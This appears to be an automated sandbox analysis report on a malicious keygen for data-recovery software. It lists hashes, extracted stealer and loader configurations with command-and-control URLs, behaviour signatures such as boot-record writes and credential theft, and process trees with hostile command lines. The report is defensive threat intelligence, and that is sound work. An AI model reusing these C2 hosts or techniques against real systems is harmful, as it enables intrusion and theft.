Resubmissions
06/04/2021, 13:50
210406-gc51ndzsc2 1026/03/2021, 23:40
210326-d1ybrjhevx 1013/03/2021, 17:16
210313-8s7b52z63e 1005/03/2021, 14:52
210305-34k3zj54f2 1001/03/2021, 13:17
210301-naamxpgf4e 1028/02/2021, 20:46
210228-6q3b959xae 1028/02/2021, 20:15
210228-mbr268za12 1028/02/2021, 18:32
210228-h944b5cpxa 1028/02/2021, 15:10
210228-hnwwpyjy7j 10Analysis
-
max time kernel
414s -
max time network
463s -
platform
windows10_x64 -
resource
win10v20201028 -
submitted
28/02/2021, 20:46
Static task
static1
Behavioral task
behavioral1
Sample
[CRACKHEAP.NET]PW12345Easeus_Data_Recovery_Wizard_8_keygen.exe
Resource
win10v20201028
Behavioral task
behavioral2
Sample
[CRACKHEAP.NET]PW12345Easeus_Data_Recovery_Wizard_8_keygen.exe
Resource
win10v20201028
Behavioral task
behavioral3
Sample
[CRACKHEAP.NET]PW12345Easeus_Data_Recovery_Wizard_8_keygen.exe
Resource
win10v20201028
Behavioral task
behavioral4
Sample
[CRACKHEAP.NET]PW12345Easeus_Data_Recovery_Wizard_8_keygen.exe
Resource
win7v20201028
General
-
Target
[CRACKHEAP.NET]PW12345Easeus_Data_Recovery_Wizard_8_keygen.exe
-
Size
9.2MB
-
MD5
b806267b5f3b7760df56396b1cf05e6d
-
SHA1
5166d4c1d3e476281d9e991eababc3e4aa9ec5ad
-
SHA256
f95d12a0dbd8199d16f48d8e4cbe69a8d4ec16c534efb36e52a662664e1c1783
-
SHA512
30e393bb3898edc8ab5fb04e62ce421ddf3903075f59e3880408b300f46bb74a85088336d6e1203b2101152cebeef4c1730290b41ca77604ecb722c8f627328b
Malware Config
Extracted
http://labsclub.com/welcome
Extracted
azorult
http://kvaka.li/1210776429.php
Extracted
smokeloader
2020
http://naritouzina.net/
http://nukaraguasleep.net/
http://notfortuaj.net/
http://natuturalistic.net/
http://zaniolofusa.net/
http://4zavr.com/upload/
http://zynds.com/upload/
http://atvua.com/upload/
http://detse.net/upload/
http://dsdett.com/upload/
http://dtabasee.com/upload/
http://yeronogles.monster/upload/
Extracted
metasploit
windows/single_exec
Extracted
smokeloader
2019
http://10022020newfolder1002002131-service1002.space/
http://10022020newfolder1002002231-service1002.space/
http://10022020newfolder3100231-service1002.space/
http://10022020newfolder1002002431-service1002.space/
http://10022020newfolder1002002531-service1002.space/
http://10022020newfolder33417-01242510022020.space/
http://10022020test125831-service1002012510022020.space/
http://10022020test136831-service1002012510022020.space/
http://10022020test147831-service1002012510022020.space/
http://10022020test146831-service1002012510022020.space/
http://10022020test134831-service1002012510022020.space/
http://10022020est213531-service100201242510022020.ru/
http://10022020yes1t3481-service1002012510022020.ru/
http://10022020test13561-service1002012510022020.su/
http://10022020test14781-service1002012510022020.info/
http://10022020test13461-service1002012510022020.net/
http://10022020test15671-service1002012510022020.tech/
http://10022020test12671-service1002012510022020.online/
http://10022020utest1341-service1002012510022020.ru/
http://10022020uest71-service100201dom2510022020.ru/
http://10022020test61-service1002012510022020.website/
http://10022020test51-service1002012510022020.xyz/
http://10022020test41-service100201pro2510022020.ru/
http://10022020yest31-service100201rus2510022020.ru/
http://10022020rest21-service1002012510022020.eu/
http://10022020test11-service1002012510022020.press/
http://10022020newfolder4561-service1002012510022020.ru/
http://10022020rustest213-service1002012510022020.ru/
http://10022020test281-service1002012510022020.ru/
http://10022020test261-service1002012510022020.space/
http://10022020yomtest251-service1002012510022020.ru/
http://10022020yirtest231-service1002012510022020.ru/
Extracted
raccoon
9ba64f4b6fe448911470a88f09d6e7d5b92ff0ab
-
url4cnc
https://telete.in/jagressor_kz
Signatures
-
Azorult
An information stealer that was first discovered in 2016, targeting browsing history and passwords.
-
Glupteba Payload 6 IoCs
resource yara_rule behavioral3/memory/2640-378-0x0000000003760000-0x0000000003FBD000-memory.dmp family_glupteba behavioral3/memory/2640-379-0x0000000000400000-0x0000000000C77000-memory.dmp family_glupteba behavioral3/memory/2640-381-0x0000000000400000-0x0000000000C77000-memory.dmp family_glupteba behavioral3/memory/2112-840-0x0000000000400000-0x0000000000C1B000-memory.dmp family_glupteba behavioral3/memory/2112-842-0x0000000003700000-0x0000000003F02000-memory.dmp family_glupteba behavioral3/memory/2112-843-0x0000000000400000-0x0000000000C1B000-memory.dmp family_glupteba -
MetaSploit
Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.
-
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine Payload 4 IoCs
resource yara_rule behavioral3/memory/7012-409-0x0000000000400000-0x0000000000428000-memory.dmp family_redline behavioral3/memory/7020-418-0x0000000000980000-0x00000000009A6000-memory.dmp family_redline behavioral3/memory/5500-743-0x00000000049F0000-0x0000000004A1E000-memory.dmp family_redline behavioral3/memory/5500-747-0x0000000007140000-0x000000000716C000-memory.dmp family_redline -
SmokeLoader
Modular backdoor trojan in use since 2014.
-
Modifies boot configuration data using bcdedit 13 IoCs
pid Process 6472 bcdedit.exe 7172 bcdedit.exe 3280 bcdedit.exe 7632 bcdedit.exe 7832 bcdedit.exe 5884 bcdedit.exe 784 bcdedit.exe 6576 bcdedit.exe 4388 bcdedit.exe 6256 bcdedit.exe 7184 bcdedit.exe 3672 bcdedit.exe 2912 bcdedit.exe -
Nirsoft 6 IoCs
resource yara_rule behavioral3/files/0x000100000001ab8a-86.dat Nirsoft behavioral3/files/0x000100000001ab8a-85.dat Nirsoft behavioral3/files/0x000100000001abbe-118.dat Nirsoft behavioral3/files/0x000100000001abbe-117.dat Nirsoft behavioral3/files/0x000100000001abc4-139.dat Nirsoft behavioral3/files/0x000100000001abc4-140.dat Nirsoft -
XMRig Miner Payload 3 IoCs
resource yara_rule behavioral3/memory/3668-768-0x0000000140000000-0x000000014072E000-memory.dmp xmrig behavioral3/memory/3668-773-0x0000000140000000-0x000000014072E000-memory.dmp xmrig behavioral3/memory/3668-774-0x0000000140000000-0x000000014072E000-memory.dmp xmrig -
Creates new service(s) 1 TTPs
-
Executes dropped EXE 10 IoCs
pid Process 3556 keygen-pr.exe 3420 keygen-step-1.exe 1120 keygen-step-3.exe 1288 keygen-step-4.exe 1516 key.exe 2688 Setup.exe 3940 key.exe 3776 26FF190E7AE0F7C7.exe 3228 26FF190E7AE0F7C7.exe 3968 firefox.exe -
Modifies Windows Firewall 1 TTPs
-
Possible attempt to disable PatchGuard 2 TTPs
Rootkits can use kernel patching to embed themselves in an operating system.
-
resource yara_rule behavioral3/files/0x000100000001ab82-33.dat office_xlm_macros -
resource yara_rule behavioral3/files/0x0002000000015660-125.dat upx behavioral3/files/0x0002000000015660-127.dat upx -
Loads dropped DLL 1 IoCs
pid Process 804 MsiExec.exe -
Modifies file permissions 1 TTPs 1 IoCs
pid Process 5296 icacls.exe -
Obfuscated with Agile.Net obfuscator 1 IoCs
Detects use of the Agile.Net commercial obfuscator, which is capable of entity renaming and control flow obfuscation.
resource yara_rule behavioral3/memory/5224-325-0x0000000006540000-0x0000000006561000-memory.dmp agile_net -
Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Uses the VBS compiler for execution 1 TTPs
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
description ioc Process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Setup.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 26FF190E7AE0F7C7.exe -
Enumerates connected drives 3 TTPs 48 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\N: msiexec.exe File opened (read-only) \??\T: msiexec.exe File opened (read-only) \??\H: msiexec.exe File opened (read-only) \??\O: msiexec.exe File opened (read-only) \??\R: msiexec.exe File opened (read-only) \??\U: msiexec.exe File opened (read-only) \??\V: msiexec.exe File opened (read-only) \??\A: msiexec.exe File opened (read-only) \??\X: msiexec.exe File opened (read-only) \??\P: msiexec.exe File opened (read-only) \??\V: msiexec.exe File opened (read-only) \??\E: msiexec.exe File opened (read-only) \??\W: msiexec.exe File opened (read-only) \??\Y: msiexec.exe File opened (read-only) \??\E: msiexec.exe File opened (read-only) \??\G: msiexec.exe File opened (read-only) \??\K: msiexec.exe File opened (read-only) \??\M: msiexec.exe File opened (read-only) \??\T: msiexec.exe File opened (read-only) \??\I: msiexec.exe File opened (read-only) \??\M: msiexec.exe File opened (read-only) \??\Y: msiexec.exe File opened (read-only) \??\Z: msiexec.exe File opened (read-only) \??\O: msiexec.exe File opened (read-only) \??\A: msiexec.exe File opened (read-only) \??\I: msiexec.exe File opened (read-only) \??\K: msiexec.exe File opened (read-only) \??\B: msiexec.exe File opened (read-only) \??\H: msiexec.exe File opened (read-only) \??\L: msiexec.exe File opened (read-only) \??\B: msiexec.exe File opened (read-only) \??\P: msiexec.exe File opened (read-only) \??\Q: msiexec.exe File opened (read-only) \??\F: msiexec.exe File opened (read-only) \??\S: msiexec.exe File opened (read-only) \??\G: msiexec.exe File opened (read-only) \??\N: msiexec.exe File opened (read-only) \??\X: msiexec.exe File opened (read-only) \??\Z: msiexec.exe File opened (read-only) \??\J: msiexec.exe File opened (read-only) \??\R: msiexec.exe File opened (read-only) \??\J: msiexec.exe File opened (read-only) \??\S: msiexec.exe File opened (read-only) \??\Q: msiexec.exe File opened (read-only) \??\F: msiexec.exe File opened (read-only) \??\L: msiexec.exe File opened (read-only) \??\U: msiexec.exe File opened (read-only) \??\W: msiexec.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 12 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 50 api.ipify.org 152 ip-api.com 349 api.2ip.ua 546 ip-api.com 340 ipinfo.io 348 api.2ip.ua 351 ipinfo.io 395 api.2ip.ua 91 ipinfo.io 93 ipinfo.io 180 api.ipify.org 181 ipinfo.io -
Writes to the Master Boot Record (MBR) 1 TTPs 2 IoCs
Bootkits write to the MBR to gain persistence at a level below the operating system.
description ioc Process File opened for modification \??\PhysicalDrive0 Setup.exe File opened for modification \??\PhysicalDrive0 26FF190E7AE0F7C7.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs
pid Process 2688 Setup.exe -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 1516 set thread context of 3940 1516 key.exe 88 -
Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 17 IoCs
pid pid_target Process procid_target 4380 4396 WerFault.exe 137 3912 4396 WerFault.exe 137 4988 4396 WerFault.exe 137 6328 4396 WerFault.exe 137 6740 4396 WerFault.exe 137 6408 4396 WerFault.exe 137 5584 4396 WerFault.exe 137 6760 4396 WerFault.exe 137 7080 4396 WerFault.exe 137 5944 6124 WerFault.exe 400 4448 6124 WerFault.exe 400 5792 6124 WerFault.exe 400 6020 6124 WerFault.exe 400 7644 6124 WerFault.exe 400 6768 6124 WerFault.exe 400 4504 6124 WerFault.exe 400 5172 6124 WerFault.exe 400 -
Checks SCSI registry key(s) 3 TTPs 9 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\DeviceDesc 26FF190E7AE0F7C7.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\FriendlyName 26FF190E7AE0F7C7.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\FriendlyName 26FF190E7AE0F7C7.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\FriendlyName 26FF190E7AE0F7C7.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_SANU&PROD_SANU_DVD-ROM\4&37CE57BA&0&010000 26FF190E7AE0F7C7.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_&PROD_HEARTDISK\4&37CE57BA&0&000000 26FF190E7AE0F7C7.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\DeviceDesc 26FF190E7AE0F7C7.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_SANU&PROD_SANU_DVD-ROM\4&37CE57BA&0&010000 26FF190E7AE0F7C7.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\DeviceDesc 26FF190E7AE0F7C7.exe -
Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 1712 schtasks.exe 64 schtasks.exe -
Delays execution with timeout.exe 2 IoCs
pid Process 8032 timeout.exe 6460 timeout.exe -
Kills process with taskkill 4 IoCs
pid Process 6024 TASKKILL.exe 7336 taskkill.exe 4100 taskkill.exe 6400 taskkill.exe -
description ioc Process Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\6C0CE2DD0584C47CAC18839F14055F19FA270CDD\Blob = 0300000001000000140000006c0ce2dd0584c47cac18839f14055f19fa270cdd2000000001000000500500003082054c30820434a0030201020206016de34cff62300d06092a864886f70d01010b05003081aa313b303906035504030c32436861726c65732050726f78792043412028313920e58d81e69c8820323031392c204445534b544f502d424e41543131552931253023060355040b0c1c68747470733a2f2f636861726c657370726f78792e636f6d2f73736c3111300f060355040a0c08584b3732204c74643111300f06035504070c084175636b6c616e643111300f06035504080c084175636b6c616e64310b3009060355040613024e5a301e170d3030303130313030303030305a170d3438313231353039313533375a3081aa313b303906035504030c32436861726c65732050726f78792043412028313920e58d81e69c8820323031392c204445534b544f502d424e41543131552931253023060355040b0c1c68747470733a2f2f636861726c657370726f78792e636f6d2f73736c3111300f060355040a0c08584b3732204c74643111300f06035504070c084175636b6c616e643111300f06035504080c084175636b6c616e64310b3009060355040613024e5a30820122300d06092a864886f70d01010105000382010f003082010a0282010100ae86c5043ed34d99f44fa3052ea34047a7fbbe33188b1dc2ca645ca3249e85e54b4921d4998fda6a22247c32d9087d742af3bf850803ae8c1e25faad53fb8fd823b7353d9a3ac992bf917f693826c790e53a540b120b6553508ec9585e467d310bd3ef9fb61731deb522eb78f43f824b34be36782db7a8cb162cd22247b14e4c5ae633ed66542354a59971bddc59160ecdc521b4477c93ca9e624e0af00298602300f5dc368819c3cb9f02604636888276b3a498570473b5328b0834f327c34285e333da9207e12f0edbb654c8cf11e3cc7cba17a52cd7cd42c10ae095a2e4eb9d3e3f361488243f0584af40e72d6e6e182149bfb8342384f60f12e14734258d0203010001a382017430820170300f0603551d130101ff040530030101ff3082012c06096086480186f842010d0482011d138201195468697320526f6f74206365727469666963617465207761732067656e65726174656420627920436861726c65732050726f787920666f722053534c2050726f7879696e672e20496620746869732063657274696669636174652069732070617274206f66206120636572746966696361746520636861696e2c2074686973206d65616e73207468617420796f752772652062726f7773696e67207468726f75676820436861726c65732050726f787920776974682053534c2050726f7879696e6720656e61626c656420666f72207468697320776562736974652e20506c656173652073656520687474703a2f2f636861726c657370726f78792e636f6d2f73736c20666f72206d6f726520696e666f726d6174696f6e2e300e0603551d0f0101ff040403020204301d0603551d0e04160414f8d0dc54367cf794020f8b92783a5d8a91251f9f300d06092a864886f70d01010b05000382010100662271eb9d5c744c88382de98ba37320e6312104d04273a92007a8670976d6530e6347d00bbded1319bb6754f36237596095922911e3661a70354f6ba0b797a76258be7adebb8c8dbeeed977760b80271d74b2444d92f6c1337a379b73545b251de5f8812b9625abbbfaedc15f8c6c374b9b26dd0fef035185f5899d8819e689dc6db5f0babbfd637c52b1bec80115b889faeed493d4112d744954ad3abe6607c41a4a2d657ba330ed131fa4e8c25bb28ee181dcef8da91c17bfd30a23c8eae81b152ed85ff938afc32b34ffdaffbdb72d9bb04067bfc87f579eba9637b165ea008ea7408bc8265f33c039bf60f506d245a6b53017afc8e161d70ed5b0d76576 Setup.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\6C0CE2DD0584C47CAC18839F14055F19FA270CDD Setup.exe -
Runs .reg file with regedit 2 IoCs
pid Process 4224 regedit.exe 4820 regedit.exe -
Runs ping.exe 1 TTPs 5 IoCs
pid Process 5424 PING.EXE 2780 PING.EXE 3284 PING.EXE 4672 PING.EXE 4872 PING.EXE -
Script User-Agent 5 IoCs
Uses user-agent string associated with script host/environment.
description flow ioc HTTP User-Agent header 92 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 99 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 179 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 339 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 350 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) -
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 1516 key.exe 1516 key.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeShutdownPrivilege 1332 msiexec.exe Token: SeIncreaseQuotaPrivilege 1332 msiexec.exe Token: SeSecurityPrivilege 2308 msiexec.exe Token: SeCreateTokenPrivilege 1332 msiexec.exe Token: SeAssignPrimaryTokenPrivilege 1332 msiexec.exe Token: SeLockMemoryPrivilege 1332 msiexec.exe Token: SeIncreaseQuotaPrivilege 1332 msiexec.exe Token: SeMachineAccountPrivilege 1332 msiexec.exe Token: SeTcbPrivilege 1332 msiexec.exe Token: SeSecurityPrivilege 1332 msiexec.exe Token: SeTakeOwnershipPrivilege 1332 msiexec.exe Token: SeLoadDriverPrivilege 1332 msiexec.exe Token: SeSystemProfilePrivilege 1332 msiexec.exe Token: SeSystemtimePrivilege 1332 msiexec.exe Token: SeProfSingleProcessPrivilege 1332 msiexec.exe Token: SeIncBasePriorityPrivilege 1332 msiexec.exe Token: SeCreatePagefilePrivilege 1332 msiexec.exe Token: SeCreatePermanentPrivilege 1332 msiexec.exe Token: SeBackupPrivilege 1332 msiexec.exe Token: SeRestorePrivilege 1332 msiexec.exe Token: SeShutdownPrivilege 1332 msiexec.exe Token: SeDebugPrivilege 1332 msiexec.exe Token: SeAuditPrivilege 1332 msiexec.exe Token: SeSystemEnvironmentPrivilege 1332 msiexec.exe Token: SeChangeNotifyPrivilege 1332 msiexec.exe Token: SeRemoteShutdownPrivilege 1332 msiexec.exe Token: SeUndockPrivilege 1332 msiexec.exe Token: SeSyncAgentPrivilege 1332 msiexec.exe Token: SeEnableDelegationPrivilege 1332 msiexec.exe Token: SeManageVolumePrivilege 1332 msiexec.exe Token: SeImpersonatePrivilege 1332 msiexec.exe Token: SeCreateGlobalPrivilege 1332 msiexec.exe Token: SeCreateTokenPrivilege 1332 msiexec.exe Token: SeAssignPrimaryTokenPrivilege 1332 msiexec.exe Token: SeLockMemoryPrivilege 1332 msiexec.exe Token: SeIncreaseQuotaPrivilege 1332 msiexec.exe Token: SeMachineAccountPrivilege 1332 msiexec.exe Token: SeTcbPrivilege 1332 msiexec.exe Token: SeSecurityPrivilege 1332 msiexec.exe Token: SeTakeOwnershipPrivilege 1332 msiexec.exe Token: SeLoadDriverPrivilege 1332 msiexec.exe Token: SeSystemProfilePrivilege 1332 msiexec.exe Token: SeSystemtimePrivilege 1332 msiexec.exe Token: SeProfSingleProcessPrivilege 1332 msiexec.exe Token: SeIncBasePriorityPrivilege 1332 msiexec.exe Token: SeCreatePagefilePrivilege 1332 msiexec.exe Token: SeCreatePermanentPrivilege 1332 msiexec.exe Token: SeBackupPrivilege 1332 msiexec.exe Token: SeRestorePrivilege 1332 msiexec.exe Token: SeShutdownPrivilege 1332 msiexec.exe Token: SeDebugPrivilege 1332 msiexec.exe Token: SeAuditPrivilege 1332 msiexec.exe Token: SeSystemEnvironmentPrivilege 1332 msiexec.exe Token: SeChangeNotifyPrivilege 1332 msiexec.exe Token: SeRemoteShutdownPrivilege 1332 msiexec.exe Token: SeUndockPrivilege 1332 msiexec.exe Token: SeSyncAgentPrivilege 1332 msiexec.exe Token: SeEnableDelegationPrivilege 1332 msiexec.exe Token: SeManageVolumePrivilege 1332 msiexec.exe Token: SeImpersonatePrivilege 1332 msiexec.exe Token: SeCreateGlobalPrivilege 1332 msiexec.exe Token: SeCreateTokenPrivilege 1332 msiexec.exe Token: SeAssignPrimaryTokenPrivilege 1332 msiexec.exe Token: SeLockMemoryPrivilege 1332 msiexec.exe -
Suspicious use of FindShellTrayWindow 1 IoCs
pid Process 1332 msiexec.exe -
Suspicious use of SetWindowsHookEx 3 IoCs
pid Process 2688 Setup.exe 3776 26FF190E7AE0F7C7.exe 3228 26FF190E7AE0F7C7.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 1200 wrote to memory of 1984 1200 [CRACKHEAP.NET]PW12345Easeus_Data_Recovery_Wizard_8_keygen.exe 79 PID 1200 wrote to memory of 1984 1200 [CRACKHEAP.NET]PW12345Easeus_Data_Recovery_Wizard_8_keygen.exe 79 PID 1200 wrote to memory of 1984 1200 [CRACKHEAP.NET]PW12345Easeus_Data_Recovery_Wizard_8_keygen.exe 79 PID 1984 wrote to memory of 3556 1984 cmd.exe 82 PID 1984 wrote to memory of 3556 1984 cmd.exe 82 PID 1984 wrote to memory of 3556 1984 cmd.exe 82 PID 1984 wrote to memory of 3420 1984 cmd.exe 83 PID 1984 wrote to memory of 3420 1984 cmd.exe 83 PID 1984 wrote to memory of 3420 1984 cmd.exe 83 PID 1984 wrote to memory of 1120 1984 cmd.exe 84 PID 1984 wrote to memory of 1120 1984 cmd.exe 84 PID 1984 wrote to memory of 1120 1984 cmd.exe 84 PID 1984 wrote to memory of 1288 1984 cmd.exe 85 PID 1984 wrote to memory of 1288 1984 cmd.exe 85 PID 1984 wrote to memory of 1288 1984 cmd.exe 85 PID 3556 wrote to memory of 1516 3556 keygen-pr.exe 86 PID 3556 wrote to memory of 1516 3556 keygen-pr.exe 86 PID 3556 wrote to memory of 1516 3556 keygen-pr.exe 86 PID 1288 wrote to memory of 2688 1288 keygen-step-4.exe 87 PID 1288 wrote to memory of 2688 1288 keygen-step-4.exe 87 PID 1288 wrote to memory of 2688 1288 keygen-step-4.exe 87 PID 1516 wrote to memory of 3940 1516 key.exe 88 PID 1516 wrote to memory of 3940 1516 key.exe 88 PID 1516 wrote to memory of 3940 1516 key.exe 88 PID 1516 wrote to memory of 3940 1516 key.exe 88 PID 1516 wrote to memory of 3940 1516 key.exe 88 PID 1516 wrote to memory of 3940 1516 key.exe 88 PID 1516 wrote to memory of 3940 1516 key.exe 88 PID 1516 wrote to memory of 3940 1516 key.exe 88 PID 1516 wrote to memory of 3940 1516 key.exe 88 PID 1516 wrote to memory of 3940 1516 key.exe 88 PID 1516 wrote to memory of 3940 1516 key.exe 88 PID 1516 wrote to memory of 3940 1516 key.exe 88 PID 1516 wrote to memory of 3940 1516 key.exe 88 PID 1516 wrote to memory of 3940 1516 key.exe 88 PID 1516 wrote to memory of 3940 1516 key.exe 88 PID 1120 wrote to memory of 3948 1120 keygen-step-3.exe 89 PID 1120 wrote to memory of 3948 1120 keygen-step-3.exe 89 PID 1120 wrote to memory of 3948 1120 keygen-step-3.exe 89 PID 3948 wrote to memory of 2780 3948 cmd.exe 92 PID 3948 wrote to memory of 2780 3948 cmd.exe 92 PID 3948 wrote to memory of 2780 3948 cmd.exe 92 PID 2688 wrote to memory of 1332 2688 Setup.exe 95 PID 2688 wrote to memory of 1332 2688 Setup.exe 95 PID 2688 wrote to memory of 1332 2688 Setup.exe 95 PID 2308 wrote to memory of 804 2308 msiexec.exe 97 PID 2308 wrote to memory of 804 2308 msiexec.exe 97 PID 2308 wrote to memory of 804 2308 msiexec.exe 97 PID 2688 wrote to memory of 3776 2688 Setup.exe 98 PID 2688 wrote to memory of 3776 2688 Setup.exe 98 PID 2688 wrote to memory of 3776 2688 Setup.exe 98 PID 2688 wrote to memory of 3228 2688 Setup.exe 99 PID 2688 wrote to memory of 3228 2688 Setup.exe 99 PID 2688 wrote to memory of 3228 2688 Setup.exe 99 PID 2688 wrote to memory of 2968 2688 Setup.exe 100 PID 2688 wrote to memory of 2968 2688 Setup.exe 100 PID 2688 wrote to memory of 2968 2688 Setup.exe 100 PID 1288 wrote to memory of 3968 1288 keygen-step-4.exe 106 PID 1288 wrote to memory of 3968 1288 keygen-step-4.exe 106 PID 2968 wrote to memory of 3284 2968 cmd.exe 103 PID 2968 wrote to memory of 3284 2968 cmd.exe 103 PID 2968 wrote to memory of 3284 2968 cmd.exe 103 PID 3968 wrote to memory of 2052 3968 firefox.exe 297 PID 3968 wrote to memory of 2052 3968 firefox.exe 297
Processes
-
C:\Users\Admin\AppData\Local\Temp\[CRACKHEAP.NET]PW12345Easeus_Data_Recovery_Wizard_8_keygen.exe"C:\Users\Admin\AppData\Local\Temp\[CRACKHEAP.NET]PW12345Easeus_Data_Recovery_Wizard_8_keygen.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:1200 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen.bat" "2⤵
- Suspicious use of WriteProcessMemory
PID:1984 -
C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-pr.exekeygen-pr.exe -p83fsase3Ge3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:3556 -
C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe"4⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:1516 -
C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exeC:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe -txt -scanlocal -file:potato.dat5⤵
- Executes dropped EXE
PID:3940
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-1.exekeygen-step-1.exe3⤵
- Executes dropped EXE
PID:3420
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-3.exekeygen-step-3.exe3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:1120 -
C:\Windows\SysWOW64\cmd.execmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-3.exe"4⤵
- Suspicious use of WriteProcessMemory
PID:3948 -
C:\Windows\SysWOW64\PING.EXEping 1.1.1.1 -n 1 -w 30005⤵
- Runs ping.exe
PID:2780
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-4.exekeygen-step-4.exe3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:1288 -
C:\Users\Admin\AppData\Local\Temp\RarSFX2\Setup.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX2\Setup.exe"4⤵
- Executes dropped EXE
- Checks whether UAC is enabled
- Writes to the Master Boot Record (MBR)
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Modifies system certificate store
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2688 -
C:\Windows\SysWOW64\msiexec.exemsiexec.exe /i "C:\Users\Admin\AppData\Local\Temp\gdiview.msi"5⤵
- Enumerates connected drives
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:1332
-
-
C:\Users\Admin\AppData\Local\Temp\26FF190E7AE0F7C7.exeC:\Users\Admin\AppData\Local\Temp\26FF190E7AE0F7C7.exe 0011 installp15⤵
- Executes dropped EXE
- Checks whether UAC is enabled
- Writes to the Master Boot Record (MBR)
- Checks SCSI registry key(s)
- Suspicious use of SetWindowsHookEx
PID:3776 -
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe"6⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:3968
-
-
C:\Users\Admin\AppData\Roaming\1614545020682.exe"C:\Users\Admin\AppData\Roaming\1614545020682.exe" /sjson "C:\Users\Admin\AppData\Roaming\1614545020682.txt"6⤵PID:4172
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe"6⤵PID:4720
-
-
C:\Users\Admin\AppData\Roaming\1614545026354.exe"C:\Users\Admin\AppData\Roaming\1614545026354.exe" /sjson "C:\Users\Admin\AppData\Roaming\1614545026354.txt"6⤵PID:4736
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe"6⤵PID:4788
-
-
